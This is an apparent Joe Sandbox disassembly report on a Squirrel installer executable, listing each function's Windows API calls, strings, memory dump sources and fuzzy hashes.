CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 00F96CAE
WaitForSingleObject.KERNEL32(?,?), ref: 00F96CC3
GetExitCodeProcess.KERNEL32(?,?), ref: 00F96CD6
DeleteFileW.KERNEL32(?), ref: 00F96D35
CloseHandle.KERNEL32(?), ref: 00F96D5D
CloseHandle.KERNEL32(?), ref: 00F96D65
FreeResource.KERNEL32(00000000,Failed to extract installer), ref: 00F96DF2

Strings

%s\%s, xrefs: 00F96949, 00F96B10, 00F96C06
"%s" --install . %s, xrefs: 00F96C7C
%s\SquirrelSetup.log, xrefs: 00F969E5
Unable to write to %s - IT policies may be restricting access to this folder, xrefs: 00F96878, 00F96990
There was an error while installing the application. Check the setup log for more information and contact the author., xrefs: 00F96CF1
Update.exe, xrefs: 00F96BE6
SQUIRREL_TEMP, xrefs: 00F967A8
DATA, xrefs: 00F969F3
D, xrefs: 00F96C2F
Squirrel, xrefs: 00F967E5
Failed to extract installer, xrefs: 00F96D69
\SquirrelTemp, xrefs: 00F96831

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: FileResource$CreateDelete$AttributesCloseDirectoryErrorFreeHandleLastProcess$CodeExitFindLoadLockNameObjectPathSingleSizeofTempWait
String ID: "%s" --install . %s$%s\%s$%s\SquirrelSetup.log$D$DATA$Failed to extract installer$SQUIRREL_TEMP$Squirrel$There was an error while installing the application. Check the setup log for more information and contact the author.$Unable to write to %s - IT policies may be restricting access to this folder$Update.exe$\SquirrelTemp
API String ID: 3938839495-3584908181
Opcode ID: 080b5d31a2f30911a937e6ac244e2ddf58049c570f5e3de5c7d345446a1f4bd5
Instruction ID: 625fbf64380a2f5cd97a8608a1119665ee9bf6f9cc69588dfc67449dccd51410
Opcode Fuzzy Hash: 080b5d31a2f30911a937e6ac244e2ddf58049c570f5e3de5c7d345446a1f4bd5
Instruction Fuzzy Hash: 01027DB1D01228ABEF26EB60CC55ADEBBBDAF04710F0045E5E509E3151DB789F88AF51

Uniqueness

Uniqueness Score: -1.00%

Function 00F95758 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 404timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00F949CC: SetFilePointer.KERNEL32(?,?,00000000,?), ref: 00F949FF

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104), ref: 00F958E1
_wcsstr.LIBVCRUNTIME ref: 00F95917
_wcsstr.LIBVCRUNTIME ref: 00F9592D
_wcsstr.LIBVCRUNTIME ref: 00F9593E
_wcsstr.LIBVCRUNTIME ref: 00F9594F
SystemTimeToFileTime.KERNEL32(?,00000001), ref: 00F95ACF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F95AFB

Strings

\..\, xrefs: 00F95911
/..\, xrefs: 00F95949
\../, xrefs: 00F95927
/../, xrefs: 00F95938

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: FileTime_wcsstr$ByteCharLocalMultiPointerSystemWide
String ID: /../$/..\$\../$\..\
API String ID: 2500941349-3885502717
Opcode ID: edb3cce91770b2390cdd26663580b5fade95a8d30623b5423a35abe0438664b8
Instruction ID: cf7a8be80c0af4165094f8c8a1f3dc5fc993eaba214b3fe49c9d41acac7197dc
Opcode Fuzzy Hash: edb3cce91770b2390cdd26663580b5fade95a8d30623b5423a35abe0438664b8
Instruction Fuzzy Hash: BBF1EC71908B418FEB25DF24C8817A6BBE1EF85720F148A3DE8A9CB392D734D505DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00FA83D8 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1454COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00FA8553

Strings

1#QNAN, xrefs: 00FA9703
1#SNAN, xrefs: 00FA96FC
1#INF, xrefs: 00FA9720
1#IND, xrefs: 00FA96F5

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 29f4a37dd0f60043920cabae901bc66ed01ecdc8e127fe7f622b6ee70bdb5bc5
Instruction ID: ba09d7f3d804765a12d3d26198e32d898cc83913c6cb5986ef2df761eac956bd
Opcode Fuzzy Hash: 29f4a37dd0f60043920cabae901bc66ed01ecdc8e127fe7f622b6ee70bdb5bc5
Instruction Fuzzy Hash: 5AC231B1D082298FDB25CF28DD407E9B7B5EB4A354F1441EAD84DE7240EBB5AE819F40

Uniqueness

Uniqueness Score: -1.00%

Function 00F9A3EF Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F9A50E,00FAF38C,00000017), ref: 00F9A3F4
UnhandledExceptionFilter.KERNEL32(00FAF38C,?,00F9A50E,00FAF38C,00000017), ref: 00F9A3FD
GetCurrentProcess.KERNEL32(C0000409,?,00F9A50E,00FAF38C,00000017), ref: 00F9A408
TerminateProcess.KERNEL32(00000000,?,00F9A50E,00FAF38C,00000017), ref: 00F9A40F

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: b97c60cd3798a8f93cd80949ca6a03418f1adb9cc26993be79e29f0cb8c57a8c
Instruction ID: d9f519063e149d17b093c371f44d4a58f4afaac9e8116775d41ca8b0ddbe08c2
Opcode Fuzzy Hash: b97c60cd3798a8f93cd80949ca6a03418f1adb9cc26993be79e29f0cb8c57a8c
Instruction Fuzzy Hash: 42D012B600020CAFCB002BE0ED0CA893F28EB0A353F00C020F70B8A022CB314408AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F9A2FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00F91BDC: InitializeCriticalSectionEx.KERNEL32(00000010,00000000,00000000,00000000,00F975A3,?,00000000,00F97410), ref: 00F91BE2
Part of subcall function 00F91BDC: GetLastError.KERNEL32 ref: 00F91BEC

IsDebuggerPresent.KERNEL32(?,?,?,00F91037), ref: 00F9A332
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F91037), ref: 00F9A341

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F9A33C

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: aa97731f2bfd8fe6418339414d53770dd24229b3d4a6e465c42de1bb39d0ceaf
Instruction ID: 2d3e4f4525d99c413957c4475f870901a863c69b96f3eddbaf1c990b3912c031
Opcode Fuzzy Hash: aa97731f2bfd8fe6418339414d53770dd24229b3d4a6e465c42de1bb39d0ceaf
Instruction Fuzzy Hash: 62E092B02003008FEB309FA5D8047427BE4AF01704F00C93DE496C6242DBB5D44CEFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F9DED4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00F9DFCC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F9DFD6
UnhandledExceptionFilter.KERNEL32(?), ref: 00F9DFE3

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5a0f6c85afb40e42b2453bd3df62095a3245b200dbadfa4d76e52793c121522f
Instruction ID: 6dadda6417db0709f828e4fd3364ea2b6ecfc1d5e24de0fb6df4aa8ff1cc8662
Opcode Fuzzy Hash: 5a0f6c85afb40e42b2453bd3df62095a3245b200dbadfa4d76e52793c121522f
Instruction Fuzzy Hash: F631F2B490122C9BDF21DF68DC8978DBBB8BF08310F5045EAE41CA7261EB749B859F44

Uniqueness

Uniqueness Score: -1.00%

Function 00FA7F40 Relevance: 3.5, APIs: 2, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5564b015ab91444fb6e25ec2cec9df0838bde758e816cfb912a8106d78ab93b8
Instruction ID: 987d0e57a2661cc83fb30db570fcabf5b174b4c8abfa89c2d5c853b1c30dd594
Opcode Fuzzy Hash: 5564b015ab91444fb6e25ec2cec9df0838bde758e816cfb912a8106d78ab93b8
Instruction Fuzzy Hash: 26023FB1E002199FDF14CFA8C8806AEBBF1FF89364F158269D915A7340DB71AD06DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FACEE1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FACEDC,?,?,00000008,?,?,00FACB70,00000000), ref: 00FAD10E

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 18cb7e95d06fddffbc441d73ec90a6ea201444dc0b404ad33f53d87a29ad2519
Instruction ID: b1c2e6f88d02a32a25ea14385f032a465a9a96dfef56da57c413315773f4d4b6
Opcode Fuzzy Hash: 18cb7e95d06fddffbc441d73ec90a6ea201444dc0b404ad33f53d87a29ad2519
Instruction Fuzzy Hash: C3B15CB2610608DFE715CF28C486B657BE1FF46364F258658E89ACF2A1C335ED82DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00FA5564 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66706dd835715e3e84703854a68ad939ddb581b1afeec9d4a63110daedab1cc1
Instruction ID: 63a7a4918536769e6db8cd57c1d372c2e7832bb48da3d419797abe7087eab24e
Opcode Fuzzy Hash: 66706dd835715e3e84703854a68ad939ddb581b1afeec9d4a63110daedab1cc1
Instruction Fuzzy Hash: D13109B6D0061DAFCB24DFA8CC89DBB777DEB86720F544558F80597241EA30AE40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F9AFBB Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000AFC7,00F9A9D3), ref: 00F9AFC0

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e9315b9a0c17d2b2050e375728f6f1c23d5a0025c87a85aa084ef9a8d2eef902
Instruction ID: 8e44810b1f7a2e2dd2da69c463b883c04d6a4f33fcbfba028db4368cbd17cb40
Opcode Fuzzy Hash: e9315b9a0c17d2b2050e375728f6f1c23d5a0025c87a85aa084ef9a8d2eef902
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00F9F9B5 Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

0, xrefs: 00F9FB4D

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c1c5736a1edb2e386e04da77f2653796f6448c1c164afe7e95b2ad160209fb23
Instruction ID: e3ed0d109ef44a1bad50200a93a9dfc371d14e67e474b7de8ba4cd9ca3f98db4
Opcode Fuzzy Hash: c1c5736a1edb2e386e04da77f2653796f6448c1c164afe7e95b2ad160209fb23
Instruction Fuzzy Hash: 4E618C71F0020A5BFF389E2888A1BBE7395EB86320F14453DE44AEB281D75D9D4DB741

Uniqueness

Uniqueness Score: -1.00%

Function 00F9F781 Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

0, xrefs: 00F9F8FD

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 25b695a74bb64f9ad739f35219ce23ff0f23f30a5c4f624dfa67082cdc738033
Instruction ID: dca8deb589b65ce68efff85df91a692640635e7b74af2cd0244bd8296be891cb
Opcode Fuzzy Hash: 25b695a74bb64f9ad739f35219ce23ff0f23f30a5c4f624dfa67082cdc738033
Instruction Fuzzy Hash: EA51AC71E006086AFF788AA88C957BE7799AF42328F14093EE442DB391DA15DD4DF353

Uniqueness

Uniqueness Score: -1.00%

Function 00FA6580 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00FA6580

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 5574067f7c20ce57b669260490870c77ed7594cb101eb3211b4b070014022654
Instruction ID: 90c01eadd9bfafb87bda276e0bae0bdbe3ce3694d876d6dea8e5ec9ba6f5909d
Opcode Fuzzy Hash: 5574067f7c20ce57b669260490870c77ed7594cb101eb3211b4b070014022654
Instruction Fuzzy Hash: 23A011B020020CCF83008F32AA082083AE8BA0A2C03808228A008C82A0EB208002AE00

Uniqueness

Uniqueness Score: -1.00%

Function 00F92FF0 Relevance: .8, Instructions: 783COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb8880e13b4bd7a421b5c652f81d99acc1cddf2eb58d9200cdf6c6a2b7789671
Instruction ID: 7da7520d86c2ab1284997243fbdefa283e7182644ba18ebcd2e3c7e12c4deca4
Opcode Fuzzy Hash: fb8880e13b4bd7a421b5c652f81d99acc1cddf2eb58d9200cdf6c6a2b7789671
Instruction Fuzzy Hash: 2F62D5B5E0021ADFDF04CFA9C994AADBBF1FB48310F24816AD815AB245D734EA51DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F938F8 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f527036661622c79dfae159ecf74a0f0669b7e2bfc8a8abecd950a15f180c77d
Instruction ID: ee521722045f96e9d6e51659297b0a0a1c501c74ab0a065ec17cbe6f364b7f72
Opcode Fuzzy Hash: f527036661622c79dfae159ecf74a0f0669b7e2bfc8a8abecd950a15f180c77d
Instruction Fuzzy Hash: 9EF1C275E002298FEF64CF28C990B99B7B2BB89314F1481EAD54DE7341DB30AE859F51

Uniqueness

Uniqueness Score: -1.00%

Function 00F9465F Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b95e58fb501847fd558a3075b066866607a6e96652afa1aa3fc654d5e7f06d
Instruction ID: e535361cb53a78e1fa8dfb6b6b62477ba470f81bdf46878c0a9ece551810d9af
Opcode Fuzzy Hash: f8b95e58fb501847fd558a3075b066866607a6e96652afa1aa3fc654d5e7f06d
Instruction Fuzzy Hash: 01B104B1A00B40CFE738CF19C890A22B7F5FF59315B258A5ED4AA8B691D735F806DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FABBC8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a46603d60d39e037c0214cb3d5704c9092ed62907bf4928d9b505fe54f38f82
Instruction ID: e86e2eb76f4ebed71323b0e6145c3a85b2dd1ed44d75159de08198348d2b1595
Opcode Fuzzy Hash: 6a46603d60d39e037c0214cb3d5704c9092ed62907bf4928d9b505fe54f38f82
Instruction Fuzzy Hash: 8D21A473F204384B770CC47E8C5227DB6E1C68C511745427AE8A6DA2C1E968D927E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00FABAA4 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d6a8a3f6f9dbe10064608754475a1f1f7993c730a3924dc6edf5d60851a3db
Instruction ID: 68bb9e4988173fae52e93911dd5016d79af99221447841ddff3002f62aeaff58
Opcode Fuzzy Hash: 76d6a8a3f6f9dbe10064608754475a1f1f7993c730a3924dc6edf5d60851a3db
Instruction Fuzzy Hash: BA11A723F30C295B275C81AD8C1727AA2D2EBD825070F433AD826E7284E994DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 00F942C9 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 044fab8fdf9bc68954b6a5464fb5a0b65563821a6d749c8c2882e3a7a85f88be
Instruction ID: d42983b2e1dbcfbb02ffe4cc25da8102522738e9ea389a133f01dd03c7740616
Opcode Fuzzy Hash: 044fab8fdf9bc68954b6a5464fb5a0b65563821a6d749c8c2882e3a7a85f88be
Instruction Fuzzy Hash: E42184309350B10A960E47BAAC65636BB949B476033CB43AFE997E90C2C52DD520FBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA52EB Relevance: .0, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013847888.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.2013818806.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013877747.0000000000FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013923119.0000000000FBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013954160.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_0923840932020004-3-0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b49f341b2c4d21b5e45a47f73c39f37c7c68b2ac7f0d8e66cdc5e13c3d45f41
Instruction ID: 4252b89e85b50aef11fe4d412e5807bf03e2093247fca72b5a403e21b461ad2f
